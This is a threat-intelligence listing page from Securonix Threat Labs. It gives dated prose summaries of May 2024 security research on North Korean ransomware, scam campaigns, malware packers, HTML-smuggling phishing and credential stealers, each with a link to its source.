Securonix Threat Labs

Get up-to-date threat content from the experts at Securonix Threat Labs.

Uncover the threats of tomorrow, today.

Securonix Threat Labs helps your team fend off rising threats by bringing the industry’s brightest minds together to equip you with the latest countermeasures and best practices.

Powered by Threat Labs

Autonomous Threat Sweeper

Acting as your own dedicated Cyber Rapid Response Team, Securonix Autonomous Threat Sweeper (ATS) automatically and retroactively hunts for new and emerging threats based on the latest threat intelligence from our Threat Labs Team.

Latest ATS Entries

All indicators of compromise (IOC) and Spotter queries are available on our GitHub repository.

2024-05-29
North_Korean_Hackers_Linked_to_New_FakePenny_Ransomware
MEDIUM
+
Intel Source:
Microsoft
Intel Name:
North_Korean_Hackers_Linked_to_New_FakePenny_Ransomware
Date of Scan:
2024-05-29
Impact:
MEDIUM
Summary:
Microsoft researchers have discovered a new North Korean threat actor, now known as Moonstone Sleet (formerly Storm-1789). This actor targets companies for financial and cyberespionage purposes by utilizing a variety of well-established tactics also employed by other North Korean threat actors as well as original attack methodologies. In order to interact with possible targets, Moonstone Sleet is known to build fake companies and job opportunities, use trojanized copies of legitimate tools, create malicious games, and distribute brand-new customized ransomware.
Source: https://www.microsoft.com/en-us/security/blog/2024/05/28/moonstone-sleet-emerges-as-new-north-korean-threat-actor-with-new-bag-of-tricks/
2024-05-29
Uncovers_Piano_Themed_Email_Scam
LOW
+
Intel Source:
Proofpoint
Intel Name:
Uncovers_Piano_Themed_Email_Scam
Date of Scan:
2024-05-29
Impact:
LOW
Summary:
Researchers at Proofpoint have noticed a pattern of activity involving malicious email campaigns that use piano-themed messages to trick users into falling for advance fee fraud (AFF) scams. The campaigns are still continuing strong and have been since at least January 2024. Although there has been some targeting of other businesses, such as healthcare and food and beverage services, the majority of the messages are directed towards students and teachers at North American schools and universities. So far this year, Proofpoint has seen at least 125,000 mails connected to the cluster of piano scam campaigns.
Source: https://www.proofpoint.com/us/blog/threat-insight/security-brief-sing-us-song-youre-piano-scam
2024-05-28
Online_scams_during_Hajj_season
LOW
+
Intel Source:
Resecurity
Intel Name:
Online_scams_during_Hajj_season
Date of Scan:
2024-05-28
Impact:
LOW
Summary:
Resecurity researchers observed the rise of fraudulent schemes targeting Hajj pilgrims, highlighting the use of fake websites and social media to impersonate the official Hajj platform, Nusuk. Fraudsters collect sensitive information for identity theft and financial fraud. Also, Resecurity has blocked over 630 accounts distributing fraudulent content. The article advises verifying the authenticity of websites, using official ministry accounts, obtaining written agreements, and reporting scams to authorities. It emphasizes the importance of caution and awareness to prevent victimization during the Hajj season.
Source: https://www.resecurity.com/blog/article/navigating-the-hajj-season-a-time-of-spiritual-unity-and-rising-cyber-threats-targeting-consumers
2024-05-28
WIDESPREAD_NSIS_BASED_MALICIOUS_PACKER_FAMILY
LOW
+
Intel Source:
Checkpoint
Intel Name:
WIDESPREAD_NSIS_BASED_MALICIOUS_PACKER_FAMILY
Date of Scan:
2024-05-28
Impact:
LOW
Summary:
Checkpoint researchers have identified a packer family using the NSIS (Nullsoft Scriptable Install System) tool, commonly used by cybercriminals to hide malware from detection and analysis. These tools employ compression and encryption to create unique malware samples, making it difficult for antivirus software to detect them. They protect various malware families, such as AgentTesla, Remcos, and XLoader. NSIS-packed malware typically includes encrypted files and a malicious DLL that decrypts and executes the payload.
Source: https://research.checkpoint.com/2024/static-unpacking-for-the-widespread-nsis-based-malicious-packer-family/
2024-05-28
Using_Passive_DNS_sources
LOW
+
Intel Source:
ISC.SANS
Intel Name:
Using_Passive_DNS_sources
Date of Scan:
2024-05-28
Impact:
LOW
Summary:
ISC.Sans analyst shared a comprehensive guide on using various tools and services for DNS reconnaissance and enumeration during penetration tests. His analysis also discusses using Shodan for additional host information and the Cisco Umbrella "Investigate" API for passive DNS data. Practical applications, limitations, and examples of API usage are detailed, emphasizing the value of these tools in identifying network assets and potential vulnerabilities.
Source: https://isc.sans.edu/diary/28596
2024-05-28
Beware_of_HTML_Masquerading_as_PDF_Viewer_Login_Pages
MEDIUM
+
Intel Source:
Forcepoint
Intel Name:
Beware_of_HTML_Masquerading_as_PDF_Viewer_Login_Pages
Date of Scan:
2024-05-28
Impact:
MEDIUM
Summary:
Forcepoint X-Labs researchers have discovered a large number of phishing email instances in their telemetry targeting various government departments in APAC and masquerading as PDF viewer login pages.
Source: https://www.forcepoint.com/blog/x-labs/html-phishing-pdf-viewer-login-apac
2024-05-28
Discovering_the_Middle_Tradecraft_HTML_Smuggling_Adversary
LOW
+
Intel Source:
Huntress
Intel Name:
Discovering_the_Middle_Tradecraft_HTML_Smuggling_Adversary
Date of Scan:
2024-05-28
Impact:
LOW
Summary:
Researchers from Huntress have discovered the infrastructure of a widespread phishing campaign, which includes possibly unique tradecraft that mixes transparent proxy, injected iframes, and HTML smuggling. By using this method, an attacker can get around MFA and steal credentials from a victim who logs into a locally rendered, transparently proxied iframe of the Outlook login portal.
Source: https://www.huntress.com/blog/smugglers-gambit-uncovering-html-smuggling-adversary-in-the-middle-tradecraft
2024-05-28
Kinsing_malware_hides_itself
LOW
+
Intel Source:
Tenable
Intel Name:
Kinsing_malware_hides_itself
Date of Scan:
2024-05-28
Impact:
LOW
Summary:
Tenable researchers discovered that Kinsing also attacks Apache Tomcat servers, and uses new techniques to hide itself on the filesystem, including utilizing innocent and non-suspicious file locations for persistence. In this article, we present our technical findings and share relevant indicators of compromise (IOCs) to help the community defend against this emerging threat.
Source: https://www.tenable.com/blog/kinsing-malware-hides-itself-as-a-manual-page-and-targets-cloud-servers
2024-05-28
Potential_C2_Seeder_Queries_05282024
MEDIUM
+
Intel Source:
STR
Intel Name:
Potential_C2_Seeder_Queries_05282024
Date of Scan:
2024-05-28
Impact:
MEDIUM
Summary:
This research is part of Securonix Threat Labs - Threat Research Team
Source: https://github.com/str-int-repo/str-seeder-behavior-queries
2024-05-27
Iluria_Stealer_is_Variant_of_Another_Discord_Stealer
LOW
+
Intel Source:
CYFIRMA
Intel Name:
Iluria_Stealer_is_Variant_of_Another_Discord_Stealer
Date of Scan:
2024-05-27
Impact:
LOW
Summary:
The Iluria Stealer is likewise an NSIS installer with an obfuscated Electron application. This program downloads a malicious JavaScript file to replace Discord's index.js file in the second stage, after which it decrypts malicious code during execution to steal Discord tokens and browser credentials. Any account modifications, such as password and email updates or 2FA activation, are intercepted by this injected file, which then relays the information back to the attacker's command and control (C2) server.
Source: https://www.linkedin.com/posts/cyfirma-research-6a8073245_iluria-stealer-a-variant-of-another-discord-activity-7199376961935138817-74OP?utm_source=li_share&utm_content=feedcontent&utm_medium=g_dt_web&utm_campaign=copy

Threat Content

Shared Security Content on Sigma

Securonix Threat Labs publishes up-to-date IOCs and threat hunting queries on Sigma, allowing you to tap into a vast community of collective defense and stay ahead of emerging threat research.

Why Security Content Matters

Learn how Securonix is paving the way to make precise, and actionable security content a reality for our customers.